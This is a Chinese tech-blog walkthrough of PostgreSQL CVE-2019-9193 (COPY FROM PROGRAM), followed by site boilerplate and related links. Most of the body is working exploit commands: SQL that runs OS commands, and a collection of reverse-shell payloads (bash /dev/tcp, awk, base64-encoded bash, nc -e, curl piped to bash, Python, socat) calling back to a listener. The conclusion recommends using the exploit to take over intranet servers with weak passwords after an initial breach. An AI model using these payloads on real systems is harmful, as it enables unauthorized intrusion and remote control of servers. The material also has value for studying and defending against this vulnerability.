PostgreSQL任意命令执行(CVE-2019-9193)

最新推荐文章于 2024-05-19 20:09:45 发布
最新推荐文章于 2024-05-19 20:09:45 发布
阅读量724 收藏
点赞数
分类专栏: 漏洞分析 文章标签: postgresql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GalaxySpaceX/article/details/131481530
版权

前言:

        PostgreSQL是一个功能强大的开源对象关系型数据库系统,他使用和扩展了SQL语言,并结合了许多安全存储和扩展最复杂数据工作负载的功能,并且相较于mysql其稳定性要更好。

        漏洞触发的原因是由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

复现:

        我们使用kali即可,首先我们可以使用命令启动PostgreSQL:

                service postgresql start

         启动成功后使用命令链接启动的postgresql:

                psql -U postgres -h 127.0.0.1

        启动成功后就可以使用下面的命令进行复现,首先我们使用select version ();查看数据库版本是否> = 9.3

        当版本符合要求后,使用如下命令,命令主要功能为创建一个表,然后调用COPY TO/FROM PROGRAM功能来执行命令

CREATE TABLE run_shell(shell_output text);
COPY run_shell FROM PROGRAM 'id';
SELECT * FROM run_shell;

        

         可以看到可以成功执行命令,然后我们尝试反弹一个shell。

COPY run_shell FROM PROGRAM 'bash -i >& /dev/tcp/127.0.0.1/1122 0>&1';

         这里我们使用的是kali系统,当我们使用下面的一句话反弹shell的时候会报错:

         这是因为kali默认是没开bash的网络重定向选项,我们可以使用如下方法开启,需要去下载bash源代码,然后修改configure然后make编译才可:

cd <bash source directory>
sudo su
./configure --enable-net-redirections
make
make install

        如果被攻击系统为ubuntu或者同样关闭了bash网络重定向的时候应该如何,这里可以使用awk,注意这里转义需要添加E:

COPY run_shell FROM PROGRAM E'awk \'BEGIN {s = "/inet/tcp/0/127.0.0.1/1122"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}\' /dev/null';

 当然可以转为后台服务,在命令后添加&,转为后台服务,防止被以外关闭。

或者使用如下反弹shell也可以:

COPY run_shell FROM PROGRAM  E'bash -c \'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTEyMiAwPiYx}|{base64,-d}|{bash,-i}\'';

COPY run_shell FROM PROGRAM 'nc -e /bin/bash 127.0.0.1 1122';

COPY run_shell FROM PROGRAM 'curl 127.0.0.1/bash.html|bash';  -->>>bash.html里写(bash -i >& /dev/tcp/127.0.0.1/1122 0>&1)

COPY run_shell FROM PROGRAM E'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1122));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'';

COPY run_shell FROM PROGRAM E'socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:1122';

总结:

        该漏洞属于PostgreSQL添加的命令执行功能,但是需要我们能够登录到PostgreSQL系统,需要有账号密码才可以进行,这个漏洞在外网暴露面基本不太可能碰到,但是在我们拿下web服务器,或者通过病毒拿下内网机器后在对内网扫描后,如果发现PostgreSQL存在弱口令时可以利用该漏洞拿下服务器shell,如果权限较低则需要根据内核版本或配置缺陷进行提权。

GalaxySpaceX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 349
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要高权限所以要先弱口令爆破之后,然后查看是否是高权限。
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193
SoulCat
05-27 4046
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
漏洞复现之PostgreSQL任意命令执行CVE-2019-9193
Blood_Pupil的博客
05-09 5401
PostgreSQL任意命令执行CVE-2019-9193PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
PostgreSQL 高权限命令执行 (CVE-2019-9193)
qq_44657899的博客
10-08 926
漏洞原理 PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库). 漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。 从9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数.
postgresql 查看用户密码_PostgreSQL任意命令执行漏洞利用(CVE-2019-9193
weixin_39539563的博客
11-24 481
最近没事曰曰内网,偶然发现了一个使用空密码的pg(是的,连爆破都省了)。用navicat连上去看了下几个库都是一些业务测试数据,没什么好收集;不死心,google了一下发现有个比较新的CVE好像可以操作一下~漏洞概述最近,安全研究人员披露了PostgreSQL实例代码执行漏洞(CVE-2019-9193)的漏洞细节。具有数据库 服务器 文件读取权限的攻击者可以利用此漏洞执行任意系统命令。从9....
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3146
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更高建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
PostgreSQLpostgresql-13.5-1-osx.dmg)
11-20
PostgreSQLpostgresql-13.5-1-osx.dmg)适用于Mac OS X PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象关系型数据库...
postgresql-12.4-1-windows-x64.exe
09-10
postgresql-12.4-1-windows-x64.exe
PostgreSQLpostgresql-14.2-2-windows-x64.exe)
05-05
PostgreSQLpostgresql-14.2-2-windows-x64.exe),适用于Windows系统:PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象...
一条 Select 语句 在 Postgresql 中的执行链路
天行健,地势坤
06-11 2432
select 语句在 postgresql 内核代码的基本执行链路。
PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2593
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要高权限 所以要先弱口令爆破之后,然后查看是否是高权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
【vulhub】PostGresql远程代码执行漏洞复现(CVE-2018-1058)
errorr0
08-05 916
CVE-2018-1058
Postgresql动态执行EXECUTING语法解析过程
InternalsOf
07-01 3869
Postgresql中PLPGSQL支持动态拼接SQL并执行 本篇简单分析下EXECUTE执行流程。
Ubuntu 配置Samba
weixin_45842249的博客
05-15 251
测试中发现使用另一个ubuntu机器上的smbclient连接需要开放目标机器的139端口,而windows连 接需要开放目标机器的445端口,不清楚是不是固定的,可以自行尝试。user - smb.conf中添加的配置信息中[user]填的共享名。再重新尝试windows连接,如果能成功,原因就是ufw配置有问题。查看ufw的app list是否有samba。ip_addr - ubuntu的ip地址。此时可能时防火墙的问题,可以先将防火墙关闭。这里我设置的密码为123456。查看ufw的端口开放情况。
mysql事务(原理)
m0_74347016的博客
05-19 585
mysql事务原理
实战项目技术点(1)
qq_60396437的博客
05-15 1156
分页插件PageHelper 是 Mybatis 的一款功能强大、方便易用的分页插件,支持任何形式的单标、多表的分页查询。官网:https://pagehelper.github.io/。文件上传,是指将本地图片、视频、音频等文件上传到服务器,供其他用户浏览或下载的过程。
Oracle表空间管理
最新发布
weixin_46593978的博客
05-19 684
假设某张表的PCTFREE为20,PCTUSED为40,这就表示当一个BLOCK的空间使用率达到80%(100-PCTFREE)时,这个BLOCK就不再被允许INSERT新的数据了,而保留下来的这20%(PCTFREE)空间将会被预留为UPDATE可能发生的空间扩展,同时该BLOCK从FREE LIST中移除。需要注意的是,Oracle 9i创建表空间时默认使用手动段管理方式,Oracle 9i及之前的低版本中自动段管理方式还有较多BUG,所以不推荐使用。此外只有本地管理的表空间才能使用自动段管理方式。
postgresql10.0_x64-haosq.zip
07-18
### 回答1: postgresql10.0_x64-haosq.zip是一个文件名,它表示的是一个带有哈斯克编译器的64位PostgreSQL 10.0版本的压缩包。 PostgreSQL是一个功能强大且可扩展的开源关系数据库管理系统。它支持多种操作系统,包括Windows、Linux和Mac OS等。在这个压缩包中,"x64"表示支持64位操作系统,"haosq"可能是压缩包的创建者或者对该版本进行了某种修改。 要安装该版本的PostgreSQL,首先需要解压缩这个压缩包。然后,可以按照官方提供的安装指南进行安装和配置。在安装完成后,可以通过命令行或者可视化界面工具来管理和使用PostgreSQL数据库PostgreSQL 10.0版本在性能、安全性和功能方面有很多改进和新增的特性。其中包括改进的并行查询处理、逻辑复制、数据分区、JSONB索引等等。这些功能可以提升数据库的性能和灵活性,使其更适合处理复杂的数据工作负载。 总之,postgresql10.0_x64-haosq.zip是一个64位的PostgreSQL 10.0版本的压缩包,你可以使用它来安装和配置这个强大的开源数据库管理系统。 ### 回答2: postgresql10.0_x64-haosq.zip是一个PostgreSQL数据库的安装文件。PostgreSQL是一个开源的关系型数据库管理系统,具有高度稳定性和可靠性,广泛应用于各种规模的应用程序和网站开发中。 这个压缩文件中的x64表示适用于64位操作系统的安装版本。haosq是一个识别码,可能是某个发行版本的标识或个人定制版本的命名。 安装PostgreSQL通常需要以下步骤:首先,解压缩haosq.zip文件到你希望安装的目录。然后,运行安装文件来启动安装向导,按照向导的指示完成安装过程。在安装过程中,你可以选择安装的组件和配置选项,例如选择安装PostgreSQL服务器、客户端和相关工具、选择安装位置等。安装完成后,你需要配置数据库的初始设置,例如设置用户名、密码、监听地址和端口等。 安装完成后,你可以使用PostgreSQL提供的命令行工具或者可视化管理工具来管理数据库。你可以创建数据库、创建表和索引、执行SQL查询、导入导出数据等。PostgreSQL还支持事务和并发控制,提供了各种高级功能和扩展。 总之,postgresql10.0_x64-haosq.zip是一个PostgreSQL数据库的安装文件,通过它可以方便地安装和使用PostgreSQL数据库

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值